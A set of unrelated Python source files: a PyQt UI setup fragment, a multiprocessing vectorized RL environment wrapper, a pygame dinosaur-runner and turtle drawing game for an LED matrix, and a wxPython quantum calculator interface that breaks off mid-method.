self.ui.monthSelector.setDate(QDate(datetime.datetime.today()))
self.ui.yearSelector.setDate(QDate(datetime.datetime.today()))
self.ui.openConfFileButton.triggered.connect(self.open_conf_file)
self.ui.openLogFileButton.triggered.connect(self.open_log_file)
self.ui.actionQuit.triggered.connect(exit)
self.checkBoxes.clear()
self.ui.scrollArea.setWidgetResizable(True)
scroll_content = QWidget(self.ui.scrollArea)
scroll_layout = QVBoxLayout(scroll_content)
scroll_content.setLayout(scroll_layout)
for address in self.config.SPSaddresses:
ccb = QCheckBox(scroll_content)
ccb.setObjectName(address.replace('.', '_') + "Checkbox")
ccb.setText(address)
scroll_layout.addWidget(ccb)
self.checkBoxes.append(ccb)
self.ui.scrollArea.setWidget(scroll_content)
self.setProgressBarEnabled(False)
self.showDialogSignal.connect(self.showDialog)
if __name__ == '__main__':
# def run():
main = Main()
app = QApplication(sys.argv)
main.window = QMainWindow()
main.ui = Ui_MainWindow()
main.ui.setupUi(main.window)
main.setup_ui()
main.window.show()
logging.debug("Handing Process Over To UI Thread...")
sys.exit(app.exec_())
|
subproc_vec_env.py
|
import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
def worker(remote, parent_remote, env_fn_wrappers):
def step_env(env, action):
ob, reward, done, info = env.step(action)
if done:
ob = env.reset()
return ob, reward, done, info
parent_remote.close()
envs = [env_fn_wrapper() for env_fn_wrapper in env_fn_wrappers.x]
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
remote.send([step_env(env, action) for env, action in zip(envs, data)])
elif cmd == 'reset':
remote.send([env.reset() for env in envs])
elif cmd == 'render':
remote.send([env.render(mode='rgb_array') for env in envs])
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces_spec':
remote.send(CloudpickleWrapper((envs[0].observation_space, envs[0].action_space, envs[0].spec)))
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
for env in envs:
env.close()
class SubprocVecEnv(VecEnv):
"""
VecEnv that runs multiple environments in parallel in subproceses and communicates with them via pipes.
Recommended to use when num_envs > 1 and step() can be a bottleneck.
"""
def __init__(self, env_fns, spaces=None, context='spawn', in_series=1, worker=worker):
"""
Arguments:
env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable
in_series: number of environments to run in series in a single process
(e.g. when len(env_fns) == 12 and in_series == 3, it will run 4 processes, each running 3 envs in series)
worker: worker function. Needs to be pickleable.
"""
self.waiting = False
self.closed = False
self.in_series = in_series
nenvs = len(env_fns)
assert nenvs % in_series == 0, "Number of envs must be divisible by number of envs to run in series"
self.nremotes = nenvs // in_series
env_fns = np.array_split(env_fns, self.nremotes)
ctx = mp.get_context(context)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(self.nremotes)])
self.ps = [ctx.Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
with clear_mpi_env_vars():
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces_spec', None))
observation_space, action_space, self.spec = self.remotes[0].recv().x
self.viewer = None
VecEnv.__init__(self, nenvs, observation_space, action_space)
def step_async(self, actions):
self._assert_not_closed()
actions = np.array_split(actions, self.nremotes)
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
self._assert_not_closed()
results = [remote.recv() for remote in self.remotes]
results = _flatten_list(results)
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(('reset', None))
obs = [remote.recv() for remote in self.remotes]
obs = _flatten_list(obs)
return _flatten_obs(obs)
def close_extras(self):
self.closed = True
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
def get_images(self):
self._assert_not_closed()
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
imgs = _flatten_list(imgs)
return imgs
def _assert_not_closed(self):
assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"
def __del__(self):
if not self.closed:
self.close()
def _flatten_obs(obs):
assert isinstance(obs, (list, tuple))
assert len(obs) > 0
if isinstance(obs[0], dict):
keys = obs[0].keys()
return {k: np.stack([o[k] for o in obs]) for k in keys}
else:
return np.stack(obs)
def _flatten_list(l):
assert isinstance(l, (list, tuple))
assert len(l) > 0
assert all([len(l_) > 0 for l_ in l])
return [l__ for l_ in l for l__ in l_]
|
game_ver4.py
|
import pygame
from random import *
from turtle import*
import time
import led_display as led
import threading
#################### T-REX RUN ####################
pygame.init()
Pixel = 30
win = pygame.display.set_mode((32*Pixel, 16*Pixel))
X = 3 * Pixel
Y = 16 * Pixel - Pixel
vel_x = 10
vel_y = 10
jump = False
Eaten_Box = set()
eaten_color = 0
BLACK = (0, 0, 0)
RED = (150, 0, 0)
GREEN = (0, 50, 0)
YELLOW = (255, 255, 51)
BLUE =(0, 0, 204)
PURPLE =(204, 0, 204)
SKYBLUE = (0, 216, 255)
WHITE = (255, 255, 255)
Color_Set = [RED, GREEN, YELLOW, BLUE, PURPLE, SKYBLUE, WHITE]
spd = 0.4
run = False
dino_array = [ [ 1, 0, 0, 0, 1, 0 ],
[ 1, 0, 0, 1, 1, 1 ],
[ 1, 1, 1, 1, 1, 1 ],
[ 1, 1, 1, 1, 0, 0 ],
[ 0, 1, 1, 1, 0, 0 ],
[ 0, 1, 0, 0, 0, 0 ] ]
Ducked_dino_array= [ [ 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0 ],
[ 1, 1, 1, 1, 1, 1 ],
[ 0, 1, 1, 1, 1, 1 ],
[ 0, 1, 1, 1, 0, 0 ],
[ 0, 1, 0, 0, 0, 0 ] ]
ptera_array = [ [ 0, 0, 0, 0 ],
[ 0, 1, 0, 0 ],
[ 1, 1, 1, 1 ],
[ 0, 0, 0, 0 ] ]
Cactus_array = [ [ 0, 0, 1, 0 ],
[ 0, 1, 1, 1 ],
[ 0, 0, 1, 0 ],
[ 0, 0, 1, 0 ] ]
background = [[0 for x in range(32)] for x in range(16)]
def LED_init():
t=threading.Thread(target=led.main, args=())
t.setDaemon(True)
t.start()
return
class Dino():
def __init__(self, x, y):
self.x = x
self.y = y
self.vel_x = 10
self.vel_y = 10
self.Bowdown = 0
self.Col_U_D = 0
self.Col_L_D = 0
def draw(self):
if self.Bowdown == 0:
for i in range(6):
for j in range(6):
if dino_array[i][j] == 1:
pygame.draw.rect(win, WHITE, [int(self.x+j*Pixel), int(self.y+i*Pixel-5*Pixel), Pixel, Pixel])
led.set_pixel(int((self.x+j*Pixel)/Pixel), int((self.y+i*Pixel-5*Pixel)/Pixel), 3)
self.Col_U_D = pygame.Rect(int(self.x+0*Pixel), int(self.y-5*Pixel), 6*Pixel, 3*Pixel)
self.Col_L_D = pygame.Rect([int(self.x+Pixel), int(self.y-2*Pixel), 3*Pixel, 2*Pixel])
else:
for i in range(6):
for j in range(6):
if Ducked_dino_array[i][j] == 1:
pygame.draw.rect(win, WHITE, [int(self.x+j*Pixel), int(self.y+i*Pixel-5*Pixel), Pixel, Pixel])
led.set_pixel(int((self.x+j*Pixel)/Pixel), int((self.y+i*Pixel-5*Pixel)/Pixel), 3)
self.Col_U_D = pygame.Rect(int(self.x+0*Pixel), int(self.y-3*Pixel), 6*Pixel, 2*Pixel)
self.Col_L_D = pygame.Rect([int(self.x+1*Pixel), int(self.y-Pixel), 3*Pixel, 2*Pixel])
class Cactus():
def __init__(self):
self.Cacti_loc_x = 32
self.Cacti_loc_y = 16
self.Col_C_X = 0
self.Col_C_Y = 0
self.disappear = False
def draw(self):
if self.disappear == False:
for i in range(4):
for j in range(4):
if Cactus_array[i][j] == 1:
pygame.draw.rect(win, GREEN, [int((self.Cacti_loc_x*Pixel - Pixel)+j*Pixel), int((self.Cacti_loc_y * Pixel - 4*Pixel)+i*Pixel), Pixel, Pixel])
led.set_pixel(int(((self.Cacti_loc_x*Pixel - Pixel)+j*Pixel)/Pixel), int(((self.Cacti_loc_y*Pixel -4*Pixel)+i*Pixel)/Pixel), 3)
self.Col_C_X = pygame.Rect(int(self.Cacti_loc_x*Pixel - 0*Pixel), int(self.Cacti_loc_y * Pixel - 3*Pixel), 3*Pixel, Pixel)
self.Col_C_Y = pygame.Rect(int(self.Cacti_loc_x*Pixel - (-1)*Pixel), int(self.Cacti_loc_y * Pixel - 4*Pixel), Pixel, 4*Pixel)
else:
pass
def update(self):
self.Cacti_loc_x -= 1.3 * spd
if int(self.Cacti_loc_x*Pixel - Pixel) <= 0:
self.Cacti_loc_x = randint(32, 100)
self.disappear = False
class Box():
def __init__(self):
self.Box_loc_x = 45
self.Box_loc_y = 16
self.Col_B = 0
self.rand = 7
self.COLOR = WHITE
self.disappear = False
def draw(self):
if self.disappear == False:
pygame.draw.rect(win, self.COLOR, [int(self.Box_loc_x*Pixel - Pixel), int(self.Box_loc_y * Pixel - 10*Pixel), Pixel, Pixel])
led.set_pixel(int((self.Box_loc_x*Pixel - Pixel)/Pixel), int((self.Box_loc_y*Pixel - 10*Pixel)/Pixel), self.rand+1)
else:
pass
self.Col_B = pygame.Rect(int(self.Box_loc_x*Pixel - Pixel), int(self.Box_loc_y * Pixel - 10*Pixel), Pixel, Pixel)
def update(self):
self.Box_loc_x -= spd
if int(self.Box_loc_x*Pixel - Pixel) <= 0:
self.rand = randint(0, 6)
self.COLOR = Color_Set[self.rand]
self.Box_loc_x = randint(32, 100)
self.Box_loc_y = randint(14, 20)
self.disappear = False
class Ptera():
def __init__(self):
self.Ptera_loc_x = 64
self.Ptera_loc_y = 16
self.Col_P = 0
self.disappear = False
def draw(self):
if self.disappear == False:
for i in range(4):
for j in range(4):
if ptera_array[i][j] == 1:
pygame.draw.rect(win, YELLOW, [int((self.Ptera_loc_x*Pixel - Pixel)+j*Pixel), int((self.Ptera_loc_y * Pixel - 7*Pixel)+i*Pixel), Pixel, Pixel])
led.set_pixel(int(((self.Ptera_loc_x*Pixel - Pixel)+j*Pixel)/Pixel), int(((self.Ptera_loc_y*Pixel - 7*Pixel)+i*Pixel)/Pixel), 4)
self.Col_P = pygame.Rect(int(self.Ptera_loc_x*Pixel - Pixel), int((self.Ptera_loc_y * Pixel - 6*Pixel)+0*Pixel), 4*Pixel, 2*Pixel)
else:
pass
#pygame.draw.rect(win, ORANGE, [int(self.Ptera_loc_x*Pixel - Pixel), int(self.Ptera_loc_y * Pixel - 4*Pixel), Pixel, Pixel])
def update(self):
self.Ptera_loc_x -= spd * 2
if int(self.Ptera_loc_x*Pixel - Pixel) <= 0:
self.Ptera_loc_x = randint(32, 100)
self.Ptera_loc_y = randint(13, 16)
self.disappear = False
class Fireball():
def __init__(self):
self.Fireball_loc_x = D.x + 6*Pixel
self.Fireball_loc_y = 0
self.COLOR = RED
self.Col_F = 0
self.collision = False
self.Shoot = False
def draw(self):
pygame.draw.rect(win, self.COLOR, [self.Fireball_loc_x, self.Fireball_loc_y, Pixel, Pixel])
led.set_pixel(int(self.Fireball_loc_x/Pixel) + 6, int((self.Fireball_loc_y)/Pixel), 1)
self.Col_F = pygame.Rect(self.Fireball_loc_x, self.Fireball_loc_y, Pixel, Pixel)
self.Fireball_loc_x += Pixel
def update(self):
if self.collision == True or self.Fireball_loc_x >= 33*Pixel:
self.Fireball_loc_x = D.x + 6*Pixel
self.collision = False
self.Shoot = False
# self.COLOR = choice(list(Eaten_Box))
class Background():
def draw(self):
for i in range(16):
for j in range(32):
if background[i][j] == 0:
led.set_pixel(j, i, 0)
LED_init()
S = Background()
D = Dino(X, Y)
C = Cactus()
B = Box()
P = Ptera()
F = Fireball()
intro = True
while intro:
win.fill(BLACK)
D.draw()
for event in pygame.event.get():
if event.type == pygame.QUIT:
intro = False
run = False
userInput = pygame.key.get_pressed()
if userInput[pygame.K_SPACE]:
intro = False
run = True
pygame.display.update()
while run:
win.fill(BLACK)
for i, v in enumerate(list(Eaten_Box)):
pygame.draw.rect(win, v, [31*Pixel-i*Pixel, 0*Pixel, Pixel, Pixel])
background[0][31-i] = 1
for c in range(7):
if v == Color_Set[c]:
eaten_color = c
led.set_pixel(int((31*Pixel - i*Pixel)/Pixel), 0, eaten_color+1)
S.draw()
D.draw()
C.draw()
B.draw()
P.draw()
# Eaten_Box.discard(F.COLOR)
P.update()
C.update()
B.update()
F.update()
if F.Shoot:
F.draw()
for i in [C.Col_C_X, C.Col_C_Y]:
if i.colliderect(F.Col_F):
F.collision = True
C.disappear = True
if P.Col_P.colliderect(F.Col_F):
P.disappear = True
F.collision = True
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
userInput = pygame.key.get_pressed()
# Ducking
if userInput[pygame.K_DOWN]:
D.Bowdown = Pixel
else:
D.Bowdown = 0
# Jump
if jump is False and userInput[pygame.K_SPACE]:
jump = True
if jump is True:
D.y -= vel_y*4
vel_y -= 1
if vel_y < -10:
jump = False
vel_y = 10
# Shoot
if userInput[pygame.K_UP]:
F.Fireball_loc_y = D.y - 3*Pixel
# if len(Eaten_Box) != 0:
F.Shoot = True
# print(Eaten_Box)
for i in [D.Col_L_D, D.Col_U_D]:
if i.colliderect(P.Col_P):
print("Game Over!")
run = False
if i.colliderect(B.Col_B):
Eaten_Box.add(B.COLOR)
B.disappear = True
if i.colliderect(C.Col_C_X) or i.colliderect(C.Col_C_Y):
print("Game Over!")
run = False
pygame.time.delay(25)
pygame.display.update()
S.draw()
time.sleep(1)
#################### END of T-REX RUN ####################
mid_screen = [ [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0 ],
[ 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0 ],
[ 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0 ],
[ 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0 ],
[ 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0 ],
[ 0, 1, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 0, 1 ],
[ 0, 1, 0, 1, 0, 1, 0 ,0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1 ],
[ 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1 ],
[ 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ] ]
digit_num = [ [ [ 0, 0, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ] ], #1
[ [ 1, 1, 1 ], [ 0, 0, 1 ], [ 1, 1, 1 ], [ 1, 0, 0 ], [ 1, 1, 1 ] ], #2
[ [ 1, 1, 1 ], [ 0, 0, 1 ], [ 1, 1, 1 ], [ 0, 0, 1 ], [ 1, 1, 1 ] ], #3
[ [ 1, 0, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ] ], #4
[ [ 1, 1, 1 ], [ 1, 0, 0 ], [ 1, 1, 1 ], [ 0, 0, 1 ], [ 1, 1, 1 ] ], #5
[ [ 1, 1, 1 ], [ 1, 0, 0 ], [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ] ], #6
[ [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 0, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ] ], #7
[ [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ] ], #8
[ [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ], [ 0, 0, 1 ], [ 0, 0, 1 ] ], #9
[ [ 1, 1, 1 ], [ 1, 0, 1 ], [ 1, 0, 1 ], [ 1, 0, 1 ], [ 1, 1, 1 ] ] ] #0
class MidScreen():
def draw():
for i in range(7):
for j in range(32):
if mid_screen[i][j] == 1:
led.set_pixel(j, i, 2)
for i in range(7, 16, 1):
for j in range(13):
if mid_screen[i][j] == 1:
led.set_pixel(j, i, 6)
for j in range(13, 32, 1):
if mid_screen[i][j] == 1:
led.set_pixel(j, i, 3)
MidScreen.draw()
time.sleep(3)
S.draw()
#################### CATCH MIND ####################
#공룡게임으로 얻은 색깔 블럭 갯수를 colorlistcnt
#색(빨주노초파보흰) colorlist
print(Eaten_Box)
colorlist=["red", "green", "yellow", "blue", "purple", "skyblue", "white"]
colorlistcnt=[0,0,0,0,0,0,0]
for i in Eaten_Box:
if i in Color_Set:
colorlistcnt[Color_Set.index(i)] += 1
# RED, GREEN, YELLOW, BLUE, PURPLE, SKYBLUE, WHITE
print(colorlistcnt)
kkk=input("그릴 것을 입력하시오 : ")
print("그림이 완성되면 space를 누르시오")
#시작시간 측정
start=time.time()
bgcolor("black")
pencolor("white")
title("Catch my drawing")
#화면 설정
setup(1600,800)
hideturtle()
speed(0)
pensize(5)
#평행선
h=-350
for i in range(15):
up()
goto(-800,h)
down()
forward(1600)
h+=50
#수직선
v=-750
setheading(-90)
for i in range(31):
up()
goto(v,-400)
down()
backward(800)
v+=50
#색깔 별로 화면에 색칠해주기
def drawColor(color,b):
pensize(30)
pencolor(color)
up()
goto(725,b)
down()
goto(725,b-15)
#화면에 색깔의 존재 나타내기
for i in range(0,7,1):
if colorlistcnt[i]>0:
drawColor(colorlist[i],335-i*50)
#프로그램(창) 종료
def endP():
bye()
while(1):
mmm=input("정답을 입력하시오 : ")
answer(mmm)
if (mmm==kkk):
break
#정답 맞추기
def answer(mmm):
if mmm == kkk:
#timer = round(time.time() - start, 3)
timer = '{:.3f}'.format(round(time.time() - start, 3))
print("걸린 시간:", timer)
ID = input("이름을 입력해주세요 : ")
f = open("osscap2020.txt", 'a')
data = str(timer)
f.write(ID + ' : ' + data + 'sec' + '\n')
f.close()
wantList = input("기록 출력은 a, 종료는 q를 입력해주세요 : ")
if wantList == "a":
f = open("osscap2020.txt", 'r')
while True:
line = f.readline()
if not line: break
print(line)
f.close()
### ending screen display ###
else:
f.close()
else:print("정답이 아닙니다.")
#클릭에 따라 색칠하기
ledcolor = 7
def drawShape(x,y):
global ledcolor
if 700<=x<=750:
for k in range(0,7,1):
if 300-50*k<y<=350-50*k:
if colorlistcnt[k]>0:
pencolor(colorlist[k])
ledcolor = k+1
a=x-x%50+25
b=(y//50+1)*50
up()
goto(a,b-15)
down()
goto(a,b-30)
led.set_pixel(int((a+775)/50), int((400-b)/50), ledcolor)
onkey(endP,"space")
listen()
while 1:
onscreenclick(drawShape)
mainloop()
break
|
interface.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Quantum Calculator User Interface Module
Author: Hideto Manjo
Licence: Apache License 2.0
'''
import sys
import time
import threading
import os
import configparser
import wx
from libqc import QC
VERSION_TEXT = '0.0.2'
CONFIG_FILENAME = './default.conf'
# default configure load
CONF = configparser.ConfigParser()
if os.path.isfile(CONFIG_FILENAME) is False:
sys.stdout.write('{0} not found -> init\n'.format(CONFIG_FILENAME))
CONF['DEFAULT'] = {
'backend': 'local_qasm_simulator',
'remote': 'no',
'qubits': '3',
'qubits_max': '8',
'qubits_min': '1'
}
with open(CONFIG_FILENAME, 'w') as fp:
CONF.write(fp)
CONF.read(CONFIG_FILENAME)
class Calculator(wx.Frame):
'''
Calculator Frame
'''
# pylint: disable=too-many-ancestors
def __init__(self):
super(Calculator, self).__init__(None,
wx.ID_ANY,
'Quantum Calculator',
size=(320, 270),
style=(wx.DEFAULT_FRAME_STYLE ^
wx.RESIZE_BORDER ^
wx.MAXIMIZE_BOX))
self.__qc = QC(backend=CONF['DEFAULT'].get('backend',
'local_qasm_simulator'),
remote=CONF['DEFAULT'].getboolean('remote'),
qubits=CONF['DEFAULT'].getint('qubits', 3))
# flags
self.busy = False
self.init = True
# variables
self.base = 'dec'
# status bar
self.CreateStatusBar()
self.GetStatusBar().SetBackgroundColour(None)
self.SetStatusText('QC Ready.')
# menu bar
self.menu = Menu(self)
self.SetMenuBar(self.menu)
# panel class
root_panel = wx.Panel(self, wx.ID_ANY)
self.text_panel = TextPanel(root_panel)
self.calcbutton_panel = CalcButtonPanel(root_panel)
root_layout = wx.BoxSizer(wx.VERTICAL)
root_layout.Add(self.text_panel, 0, wx.GROW | wx.ALL, border=10)
root_layout.Add(self.calcbutton_panel, 0, wx.GROW | wx.ALL, border=10)
root_panel.SetSizer(root_layout)
root_layout.Fit(root_panel)
self.Bind(wx.EVT_MENU, self.select_menu)
# BIND FUNCTION
def select_menu(self, event):
'''
select_menu
'''
menuid = event.GetId()
if menuid == 1:
self.Close(True)
elif menuid >= 2000 and menuid < 3000:
self.set_backend(self.menu.id2backend[menuid])
elif menuid > 4000 and menuid < 5000:
qubits = int(menuid - 4000)
self.__qc.set_config({'qubits': qubits})
self.SetStatusText('Set Qubit -> {0} (0-{1}),'
' circuit requires {2} qubits at least.'
.format(qubits, 2**qubits - 1, qubits * 2 + 2))
self.calcbutton_panel.check_calctext()
elif menuid == 29:
self.SetStatusText('Loading remote backend')
self.menu.reload_backend_menu(remote=True)
self.SetStatusText('Updated')
elif menuid == 31:
self.change_base('dec')
elif menuid == 32:
self.change_base('bin')
elif menuid == 9:
box = wx.MessageDialog(None,
'Quantum Calculator v{}\n\n'
'https://github.com/hotstaff/qc\n'
'Apache Licence 2.0\n'
'© 2017 Hideto Manjo'
.format(VERSION_TEXT),
'About Quantum Calculator',
wx.OK | wx.ICON_NONE | wx.STAY_ON_TOP)
box.ShowModal()
box.Destroy()
# BIND FUNCTION END
def get_qc(self):
'''
return quantum calcurator
'''
return self.__qc
def set_backend(self, backend):
'''
set_backend
'''
self.SetStatusText('Loading {}...'.format(backend))
self.__qc.set_config({'backend': backend})
if self.__qc.load():
self.SetStatusText('Ready to use {}'.format(backend))
else:
self.SetStatusText('{} is busy'.format(backend))
def change_base(self, base='dec'):
'''
change_base
'''
self.text_panel.calc_text.Clear()
self.base = base
self.change_button_visible()
self.SetStatusText('Set input mode to {}'
.format('Binary' if base == 'bin' else 'Decimal'))
def change_button_visible(self):
'''
change button visible
'''
if self.base == 'bin':
self.calcbutton_panel.button['0'].Enable()
self.calcbutton_panel.button['1'].Enable()
for i in range(2, 10):
self.calcbutton_panel.button[str(i)].Disable()
else:
for i in range(0, 10):
self.calcbutton_panel.button[str(i)].Enable()
class Menu(wx.MenuBar):
'''
Menu
'''
# pylint: disable=too-few-public-methods
def __init__(self, frame):
super(Menu, self).__init__(wx.ID_ANY)
self.frame = frame
self.__qc = self.frame.get_qc()
menu_view = wx.Menu()
menu_view.AppendRadioItem(31, 'Decimal')
menu_view.AppendRadioItem(32, 'Binary')
self.menu_backend = wx.Menu()
self.id2backend = {}
self.reload_backend_menu()
self.menu_backend.AppendSeparator()
self.menu_backend.Append(29, 'Import Qconfig.py')
menu_circuit = wx.Menu()
qubits_max = CONF['DEFAULT'].getint('qubits_max', 8)
qubits_min = CONF['DEFAULT'].getint('qubits_min', 1)
for i in range(qubits_min, qubits_max + 1):
menu_circuit.AppendRadioItem(4000 + i, str(i))
menu_circuit.Check(4000 + int(self.__qc.qubits), True)
menu_help = wx.Menu()
menu_help.Append(9, 'About')
self.Append(menu_view, 'Input')
self.Append(menu_circuit, 'Qubit')
self.Append(self.menu_backend, 'Backend')
self.Append(menu_help, 'Help')
def reload_backend_menu(self, remote=False):
'''
reload backend menu
'''
for ident in self.id2backend:
self.menu_backend.Delete(ident)
if remote is True:
self.__qc.set_config({'remote': True})
self.__qc.load()
backends = self.__qc.backends
disable_backends = [
'local_unitary_simulator',
'local_clifford_simulator',
'ibmqx4'
]
# disable
for backend in backends[:]:
for disable_backend in disable_backends:
if backend == disable_backend:
backends.pop(backends.index(backend))
disable_backends.pop(disable_backends.index(backend))
for i, backend in enumerate(backends):
menuid = 2000 + i
if 'local' in backend:
menutitle = 'Local ({})'.format(backend)
elif 'ibmqx' in backend:
if 'simulator' in backend:
menutitle = 'IBM Q - Simulator ({})'.format(backend)
else:
menutitle = 'IBM Q - Real device ({})'.format(backend)
else:
menutitle = 'Remote ({})'.format(backend)
self.menu_backend.InsertRadioItem(i, menuid, menutitle)
if backend == self.__qc.backend:
self.menu_backend.Check(menuid, True)
self.id2backend[2000 + i] = backend
i = i + 1
class TextPanel(wx.Panel):
'''
TextPanel
'''
# pylint: disable=too-few-public-methods
def __init__(self, parent):
super(TextPanel, self).__init__(parent, wx.ID_ANY)
self.calc_text = wx.TextCtrl(self,
wx.ID_ANY,
style=wx.TE_RIGHT | wx.TE_READONLY)
font = wx.Font(20,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL)
self.calc_text.SetFont(font)
layout = wx.BoxSizer(wx.HORIZONTAL)
layout.Add(self.calc_text, 1)
self.SetSizer(layout)
class CalcButtonPanel(wx.Panel):
'''
CalcButtonPanel
'''
def __init__(self, parent):
super(CalcButtonPanel, self).__init__(parent, wx.ID_ANY)
# frame property
self.frame = parent.GetParent()
self.__qc = self.frame.get_qc()
self.calc_text = self.frame.text_panel.calc_text
# (label, buttonid, display)
button_collection = [
('7', 107, '7'),
('8', 108, '8'),
('9', 109, '9'),
('CE', 200, ''),
('4', 104, '4'),
('5', 105, '5'),
('6', 106, '6'),
('-', 201, '-'),
('1', 101, '1'),
('2', 102, '2'),
('3', 103, '3'),
('+', 202, '+'),
('0', 100, '0'),
('B', 401, ''),
('H', 300, 'H'),
('=', 203, '=')
]
# buttons
self.button = {}
self.buttonid2label = {}
for (label, buttonid, display) in button_collection:
if buttonid == 401:
self.button[label] = wx.Button(self,
buttonid,
'',
size=(30, 30))
continue
self.button[label] = wx.Button(self,
buttonid,
label,
size=(30, 30))
self.buttonid2label[str(buttonid)] = (label, display)
# button layout
layout = wx.GridSizer(4, 4, 3, 3)
for (label, buttonid, display) in button_collection:
layout.Add(self.button[label], 1, wx.GROW)
self.SetSizer(layout)
# 8, 9, B buttons are disabled
self.button['B'].Disable()
# bind button event
for i in range(10):
self.Bind(wx.EVT_BUTTON,
self._click_num_button,
self.button[str(i)])
self.Bind(wx.EVT_BUTTON, self._click_num_button, self.button['H'])
self.Bind(wx.EVT_BUTTON, self._click_ce_button, self.button['CE'])
self.Bind(wx.EVT_BUTTON, self._click_ope_button, self.button['+'])
self.Bind(wx.EVT_BUTTON, self._click_ope_button, self.button['-'])
self.Bind(wx.EVT_BUTTON, self._click_e_button, self.button['='])
@staticmethod
def show_alart(title, text):
'''
show_alart
'''
width = 128
if len(text) > width:
split_text = [text[i: i+width] for i in range(0, len(text), width)]
text = "\n".join(split_text)
dialog = wx.MessageDialog(None, text, title, style=wx.ICON_NONE)
dialog.ShowModal()
dialog.Destroy()
# BIND FUNCTIONS
def _click_num_button(self, event):
if self.frame.busy:
return False
if self.frame.init:
self.calc_text.Clear()
self.frame.init = False
display = self.buttonid2label[str(event.GetId())][1]
self.calc_text.AppendText(display)
self.check_calctext()
return True
def _click_ope_button(self, event):
self._click_num_button(event)
def _click_ce_button(self, _event):
if self.frame.busy:
return False
self.button['='].Disable()
self.calc_text.Clear()
self.frame.SetStatusText('Clear')
return True
def _click_e_button(self, _event):
